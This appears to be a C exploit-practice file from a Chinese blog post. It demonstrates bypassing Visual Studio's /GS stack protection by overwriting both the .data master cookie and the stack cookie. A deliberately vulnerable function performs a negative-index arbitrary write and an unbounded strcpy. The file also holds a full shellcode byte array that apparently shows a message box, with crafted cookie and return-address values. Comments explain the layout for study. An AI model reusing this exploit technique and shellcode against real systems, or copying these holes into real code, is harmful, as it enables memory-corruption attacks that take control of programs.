/***Name: overwrite the .data cookie and the stack cookie to bypass GS************/
/***Build: vs2010, optimization disabled, release build***/
/***Practice: Hualian***************************/

/*
 * Deliberately vulnerable proof-of-concept, not reusable code.
 *
 * The demo chains two writes performed by test():
 *   1. a 4-byte copy to s + i, where i is a signed int that only has to be
 *      below 0x9995 -- a negative i therefore passes the check and the copy
 *      lands far below the heap buffer (the file title says the target is the
 *      module's GS master cookie in .data);
 *   2. an unbounded strcpy() of Shellcode into a 200-byte stack array, which
 *      overruns the stack cookie, the saved frame pointer and the return
 *      address.
 * Every constant below (the negative index, the cookie value, the return
 * address) is tied to one specific build/stack layout; the author marked the
 * index "to be determined".
 */

#include<stdafx.h>   /* MSVC precompiled header; presumably supplies <stdio.h> for printf() -- verify */
#include<string.h>
#include<stdlib.h>

/*
 * Payload plus overwrite data, laid out to match the frame of test():
 *   - 4 leading NOPs: these are also the 4 bytes that test() copies to s + i,
 *     so the .data target is overwritten with 0x90909090;
 *   - a position-independent payload (pushes the strings "user32" and
 *     "Hualian"; appears to be a MessageBox-style payload -- not verified here);
 *   - NOP padding up to the end of dest[200] (+ alignment slack);
 *   - "\xF0\x6F\x82\x90": value placed in the stack cookie slot. NOTE(review):
 *     0x90826FF0 ^ 0x90909090 == 0x0012FF60, which looks like a frame pointer,
 *     consistent with the cookie being stored XORed with EBP -- confirm against
 *     the actual build;
 *   - 4 NOPs: presumably the saved EBP;
 *   - "\x94\xFE\x12\x00": presumably the new return address 0x0012FE94,
 *     pointing back into the overflowed buffer.
 */
char Shellcode[]=
"\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x69\x61\x6e\x22\x68\x48\x75\x61\x6c\x8B\xC4\x53\x50\x50"//\x66\x61\x69\x6C  ("fail": alternative string bytes left by the author)
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xF0\x6F\x82\x90"   /* stack cookie slot */
"\x90\x90\x90\x90"   /* saved EBP slot (presumably) */
"\x94\xFE\x12\x00"//\x91\x91\x91\x91   (return address slot)
;

/*
 * The vulnerable function.
 *
 * s   - base of a heap buffer (malloc'd by main)
 * i   - signed offset; the bound check is one-sided, so any negative value
 *       passes and the 4-byte copy below becomes a write to an arbitrary
 *       address below s. Passing 0xFFFFAFBC as an int yields -20548 on MSVC
 *       (implementation-defined conversion of an out-of-range constant).
 * src - source bytes; the first 4 go to s + i, then the whole NUL-terminated
 *       string is strcpy'd into dest with no length check at all.
 *
 * There is nothing to "fix" here without removing the demo: the missing
 * lower bound and the unbounded strcpy() are the two bugs being exploited.
 */
void test (char *s, int i, char *src)
{
char dest[200];
if(i<0x9995)        /* no check for i < 0: negative offsets get through */
{
char *buf = s + i;  /* pointer arithmetic outside the malloc'd object -- UB, relied upon by the demo */
*buf = *src;        /* 4-byte arbitrary write with src[0..3] (0x90909090) */
*(buf + 1) = *(src +1);
*(buf + 2) = *(src +2);
*(buf + 3) = *(src +3);
strcpy(dest,src);   /* stack overflow: Shellcode is far longer than 200 bytes */
}
}

/*
 * Entry point. Non-standard `void main()` (MSVC accepts it). The 0x10000-byte
 * heap buffer is never freed; it only serves as the base for the negative
 * offset. printf("look") is a marker with no trailing newline, so it may not
 * appear before the process is hijacked.
 */
void main()
{
char * str = (char*)malloc(0x10000);
printf("look");
test(str, 0xFFFFAFBC/* to be determined */,Shellcode);
}
同时替换.data与栈中的Cookie突破GS (Bypassing GS by overwriting both the .data master cookie and the stack cookie)
原文:http://www.cnblogs.com/MeiJi/p/3746625.html